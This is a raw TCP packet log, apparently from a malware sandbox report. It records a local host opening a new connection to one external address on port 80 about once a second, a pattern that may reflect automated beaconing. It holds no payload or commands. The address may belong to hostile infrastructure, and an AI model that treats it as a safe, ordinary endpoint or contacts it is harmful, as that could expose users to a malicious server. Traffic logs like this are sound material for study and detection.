                                  Oct 25, 2024 10:20:54.132812977 CEST804977694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:54.133033991 CEST4977680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:54.139132023 CEST804977694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:54.139240980 CEST4977680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:54.291934013 CEST4977780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:54.297348022 CEST804977794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:54.297456026 CEST4977780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:54.299670935 CEST4977780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:54.305320978 CEST804977794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:54.305428028 CEST4977780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:54.311223030 CEST804977794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:55.278779030 CEST804977794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:55.280817986 CEST4977780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:55.287327051 CEST804977794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:55.287379980 CEST4977780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:55.457302094 CEST4977980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:55.463474989 CEST804977994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:55.463556051 CEST4977980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:55.465573072 CEST4977980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:55.470978022 CEST804977994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:55.471024036 CEST4977980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:55.476408005 CEST804977994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:56.431684971 CEST804977994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:56.431956053 CEST4977980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:56.437552929 CEST804977994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:56.437653065 CEST4977980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:56.580887079 CEST4978080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:56.586477995 CEST804978094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:56.586551905 CEST4978080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:56.588748932 CEST4978080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:56.594129086 CEST804978094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:56.594180107 CEST4978080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:56.599509001 CEST804978094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:57.586129904 CEST804978094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:57.593282938 CEST4978080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:57.600380898 CEST804978094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:57.600444078 CEST4978080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:57.999705076 CEST4978280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:58.006963015 CEST804978294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:58.007030010 CEST4978280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:58.009188890 CEST4978280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:58.015906096 CEST804978294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:58.015959024 CEST4978280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:58.023102999 CEST804978294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:59.001586914 CEST804978294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:59.001743078 CEST4978280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:59.008491993 CEST804978294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:59.008543968 CEST4978280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:59.140880108 CEST4979380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:59.147547960 CEST804979394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:59.147646904 CEST4979380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:59.149625063 CEST4979380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:59.156179905 CEST804979394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:59.156243086 CEST4979380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:59.162837029 CEST804979394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:00.129925013 CEST804979394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:00.130044937 CEST4979380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:00.135806084 CEST804979394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:00.135885000 CEST4979380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:00.297772884 CEST4979980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:00.303570032 CEST804979994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:00.303668976 CEST4979980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:00.305784941 CEST4979980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:00.311161041 CEST804979994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:00.311297894 CEST4979980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:00.316728115 CEST804979994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:01.269588947 CEST804979994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:01.269869089 CEST4979980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:01.275785923 CEST804979994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:01.275873899 CEST4979980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:01.406294107 CEST4980580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:01.411678076 CEST804980594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:01.411755085 CEST4980580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:01.413528919 CEST4980580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:01.419007063 CEST804980594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:01.419074059 CEST4980580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:01.424406052 CEST804980594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:02.412559032 CEST804980594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:02.412806988 CEST4980580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:02.418623924 CEST804980594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:02.418714046 CEST4980580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:02.562482119 CEST4981180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:02.568272114 CEST804981194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:02.568365097 CEST4981180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:02.570369959 CEST4981180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:02.575874090 CEST804981194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:02.575992107 CEST4981180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:02.581471920 CEST804981194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:03.546508074 CEST804981194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:03.549598932 CEST4981180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:03.555551052 CEST804981194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:03.555932045 CEST4981180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:04.010301113 CEST4982280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:04.292753935 CEST804982294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:04.292936087 CEST4982280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:04.294879913 CEST4982280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:04.300345898 CEST804982294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:04.300436974 CEST4982280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:04.306054115 CEST804982294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:05.289841890 CEST804982294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:05.290132046 CEST4982280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:05.295989037 CEST804982294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:05.296066999 CEST4982280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:05.437493086 CEST4982880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:05.443068981 CEST804982894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:05.443169117 CEST4982880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:05.445229053 CEST4982880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:05.450593948 CEST804982894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:05.450685024 CEST4982880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:05.455976963 CEST804982894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:06.441284895 CEST804982894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:06.443742037 CEST4982880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:06.449512005 CEST804982894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:06.449580908 CEST4982880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:06.689073086 CEST4983680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:06.694636106 CEST804983694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:06.694742918 CEST4983680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:06.697072029 CEST4983680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:06.702497005 CEST804983694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:06.702578068 CEST4983680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:06.707926989 CEST804983694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:07.670655966 CEST804983694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:07.670809031 CEST4983680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:07.676728010 CEST804983694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:07.676791906 CEST4983680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:07.810617924 CEST4984280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:07.815920115 CEST804984294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:07.816040993 CEST4984280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:07.818147898 CEST4984280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:07.823463917 CEST804984294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:07.823534012 CEST4984280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:07.828985929 CEST804984294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:08.796101093 CEST804984294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:08.796272993 CEST4984280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:08.802408934 CEST804984294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:08.802473068 CEST4984280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:08.956855059 CEST4985180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:08.962641001 CEST804985194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:08.962766886 CEST4985180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:08.964874029 CEST4985180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:08.970519066 CEST804985194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:08.970566034 CEST4985180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:08.976768970 CEST804985194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:09.927454948 CEST804985194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:09.928770065 CEST4985180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:09.934485912 CEST804985194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:09.934541941 CEST4985180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:10.196249008 CEST4985880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:10.202615023 CEST804985894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:10.202688932 CEST4985880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:10.205096960 CEST4985880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:10.210447073 CEST804985894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:10.210496902 CEST4985880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:10.217094898 CEST804985894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:11.186306000 CEST804985894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:11.186517954 CEST4985880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:11.192385912 CEST804985894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:11.192454100 CEST4985880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:11.331716061 CEST4986480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:11.337160110 CEST804986494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:11.337272882 CEST4986480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:11.341701031 CEST4986480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:11.346988916 CEST804986494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:11.347065926 CEST4986480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:11.352417946 CEST804986494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:12.310941935 CEST804986494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:12.311125040 CEST4986480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:12.316953897 CEST804986494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:12.317034960 CEST4986480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:12.659502029 CEST4987180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:12.665402889 CEST804987194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:12.665519953 CEST4987180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:12.687748909 CEST4987180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:12.693250895 CEST804987194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:12.693350077 CEST4987180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:12.698879004 CEST804987194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:13.646570921 CEST804987194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:13.646861076 CEST4987180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:13.652803898 CEST804987194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:13.652962923 CEST4987180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:13.798983097 CEST4987780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:13.804595947 CEST804987794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:13.804722071 CEST4987780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:13.806746006 CEST4987780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:13.812365055 CEST804987794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:13.812455893 CEST4987780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:13.818099022 CEST804987794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:14.786429882 CEST804987794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:14.786667109 CEST4987780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:14.792764902 CEST804987794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:14.792884111 CEST4987780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:14.943239927 CEST4988380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:14.948859930 CEST804988394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:14.948961973 CEST4988380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:14.951975107 CEST4988380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:14.957535982 CEST804988394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:14.957762003 CEST4988380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:14.963162899 CEST804988394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:15.914707899 CEST804988394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:15.924396992 CEST4988380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:15.930331945 CEST804988394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:15.930404902 CEST4988380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:16.536046028 CEST4989480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:16.541606903 CEST804989494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:16.541708946 CEST4989480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:16.544763088 CEST4989480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:16.552217007 CEST804989494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:16.552284956 CEST4989480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:16.557640076 CEST804989494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:17.523474932 CEST804989494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:17.523591042 CEST4989480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:17.529728889 CEST804989494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:17.529788017 CEST4989480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:17.681658030 CEST4990080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:17.687355042 CEST804990094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:17.687479019 CEST4990080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:17.689528942 CEST4990080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:17.694896936 CEST804990094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:17.694981098 CEST4990080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:17.700472116 CEST804990094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:18.678745985 CEST804990094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:18.678849936 CEST4990080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:18.684573889 CEST804990094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:18.684638977 CEST4990080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:19.191509008 CEST4991080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:19.197119951 CEST804991094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:19.197237968 CEST4991080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:19.199512005 CEST4991080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:19.204818010 CEST804991094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:19.204894066 CEST4991080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:19.210283041 CEST804991094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:20.169209957 CEST804991094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:20.169404984 CEST4991080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:20.175087929 CEST804991094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:20.175157070 CEST4991080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:20.311772108 CEST4991780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:20.317269087 CEST804991794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:20.317377090 CEST4991780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:20.320362091 CEST4991780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:20.325938940 CEST804991794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:20.326056957 CEST4991780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:20.331401110 CEST804991794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:21.278759003 CEST804991794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:21.278944969 CEST4991780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:21.284965038 CEST804991794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:21.285027027 CEST4991780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:21.426316023 CEST4992480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:21.431891918 CEST804992494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:21.431962967 CEST4992480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:21.435635090 CEST4992480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:21.441344023 CEST804992494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:21.441410065 CEST4992480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:21.446854115 CEST804992494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:22.428572893 CEST804992494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:22.431466103 CEST4992480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:22.437263966 CEST804992494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:22.441597939 CEST4992480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:22.894521952 CEST4993480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:22.899799109 CEST804993494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:22.899887085 CEST4993480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:22.902010918 CEST4993480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:22.907324076 CEST804993494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:22.907366037 CEST4993480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:22.912668943 CEST804993494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:23.917716026 CEST804993494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:23.917885065 CEST4993480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:23.924134970 CEST804993494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:23.924201012 CEST4993480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:24.060159922 CEST4994080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:24.065675020 CEST804994094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:24.065953970 CEST4994080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:24.067897081 CEST4994080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:24.073621035 CEST804994094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:24.073734999 CEST4994080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:24.079067945 CEST804994094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:25.059734106 CEST804994094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:25.060704947 CEST4994080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:25.066880941 CEST804994094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:25.067943096 CEST4994080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:25.504388094 CEST4994780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:25.510020018 CEST804994794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:25.510133982 CEST4994780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:25.569238901 CEST4994780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:25.575901985 CEST804994794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:25.575978041 CEST4994780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:25.582717896 CEST804994794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:26.544379950 CEST804994794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:26.544493914 CEST4994780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:26.551184893 CEST804994794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:26.551259995 CEST4994780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:26.691339970 CEST4995480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:26.697137117 CEST804995494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:26.697350979 CEST4995480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:26.699541092 CEST4995480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:26.704988956 CEST804995494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:26.705064058 CEST4995480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:26.710735083 CEST804995494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:27.664477110 CEST804995494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:27.664575100 CEST4995480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:27.670578003 CEST804995494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:27.670651913 CEST4995480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:27.813330889 CEST4996380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:27.819133997 CEST804996394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:27.819359064 CEST4996380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:27.821489096 CEST4996380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:27.827013016 CEST804996394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:27.827106953 CEST4996380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:27.832674980 CEST804996394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:28.795599937 CEST804996394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:28.795766115 CEST4996380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:28.801640987 CEST804996394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:28.802803993 CEST4996380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:28.933613062 CEST4996980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:28.942460060 CEST804996994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:28.942959070 CEST4996980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:28.945952892 CEST4996980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:28.952238083 CEST804996994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:28.952301979 CEST4996980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:28.958503962 CEST804996994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:29.966038942 CEST804996994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:29.966248989 CEST4996980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:29.973087072 CEST804996994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:29.973140955 CEST4996980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:30.107152939 CEST4997580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:30.112447023 CEST804997594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:30.112545967 CEST4997580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:30.114675045 CEST4997580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:30.120024920 CEST804997594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:30.120093107 CEST4997580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:30.125483036 CEST804997594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:31.093755960 CEST804997594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:31.093839884 CEST4997580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:31.099992990 CEST804997594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:31.100039959 CEST4997580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:31.231038094 CEST4998580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:31.236733913 CEST804998594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:31.236836910 CEST4998580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:31.238934994 CEST4998580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:31.244609118 CEST804998594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:31.244678974 CEST4998580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:31.250490904 CEST804998594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:32.205862999 CEST804998594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:32.205975056 CEST4998580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:32.212011099 CEST804998594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:32.212069988 CEST4998580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:32.338514090 CEST4999180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:21:32.344103098 CEST804999194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:21:32.344361067 CEST4999180192.168.2.494.156.177.220
